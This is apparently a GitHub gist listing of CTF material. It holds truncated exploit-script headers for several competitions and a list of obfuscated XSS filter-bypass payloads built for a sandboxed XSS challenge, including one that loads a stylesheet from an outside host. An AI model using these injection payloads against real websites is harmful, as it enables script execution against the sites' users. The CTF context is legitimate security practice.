社会人のための趣味CTFまとめ http://hority-ctf.blogspot.jp/2014/08/ctf.html
Takumi Akiyama akiym
akiym
/ exploit.py
Last active
September 6, 2016 16:03
Candy Store - Tokyo Westerns / MMA CTF 2nd 2016
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| import os | |
| import sys | |
| import time | |
| import re | |
| import struct | |
| import socket | |
| p = lambda x: struct.pack('<I', x) | |
| u = lambda x: struct.unpack('<I', x)[0] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| import os | |
| import sys | |
| import time | |
| import re | |
| import struct | |
| import socket | |
| p = lambda x: struct.pack('<I', x) | |
| u = lambda x: struct.unpack('<I', x)[0] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| import os | |
| import sys | |
| import time | |
| import re | |
| import struct | |
| import socket | |
| p = lambda x: struct.pack("<I", x) | |
| u = lambda x: struct.unpack("<I", x)[0] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| import os | |
| import sys | |
| import time | |
| import re | |
| from pwn import * | |
| from libformatstr import * | |
| REMOTE = 0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dump.bin: file format binary | |
| Disassembly of section .data: | |
| 00000000 <.data>: | |
| _start: | |
| 0: 40 1e 00 00 movhi 0, r0, sp | |
| 4: 23 1e 80 17 movea 6016, sp, sp |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| import os | |
| import sys | |
| import time | |
| import re | |
| from pwn import * | |
| s = process('amida') | |
| # thanks~~ http://arc006.contest.atcoder.jp/submissions/140243 |
akiym
/ gist:9c9f903d824fddcaf2c8
Last active
December 8, 2015 01:06
箱庭XSSリターンズ (akiym, xrekkusu, lmt_swallow)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "onPaste="eval(';)\'SSX\'(trela'.split('').reverse().join(''))" | |
| "><link rel="stylesheet" href="http://8ant.org/asdfqwer.css"><" | |
| "onfocusin="top['\x61\x6C\x65\x72\x74']('\x58\x53\x53')" | |
| "onfocusout="parent[String.fromCharCode(500-403,500-392,500-399,500-386,500-384)](String.fromCharCode(300-212,300-217,300-217))" | |
| "onfocus="window['\141\154\145\162\164']('\130\123\123')" | |
| "onKeyDown="parent['aleraaaaat'.replace('aaaaa','')]('XaaaaaSaaaaaS'.replace('aaaaa','').replace('aaaaa',''))" | |
| "onDblClick="window['aleraaaat'.replace('aaaa','')]('XaaaaSaaaaS'.replace('aaaa','').replace('aaaa',''))" | |
| "onMouseUp="window[String.fromCharCode(501-404,501-393,501-400,501-387,501-385)]('XSS')" | |
| "onMouseEnter="alert('XSS')" | |
| "onMouseDown="alert('XSS'� |
akiym
/ gist:9185050
Created
February 24, 2014 10:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CODEGATE 2014 web500 writeup (泣いている) | |
| use 5.016; | |
| use warnings; | |
| use utf8; | |
| use LWP::UserAgent; | |
| # 150ワードあたりの文字出現数 | |
| # a: 303 | |
| # b: 115 | |
| # c: 153 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use strict; | |
| use warnings; | |
| use LWP::UserAgent; | |
| my $filename = shift or die "Usage: $0 filename\n"; | |
| my $base_url = 'http://gyazo.com/'; | |
| my $ua = LWP::UserAgent->new; | |
| my $res = $ua->post("$base_url/upload", |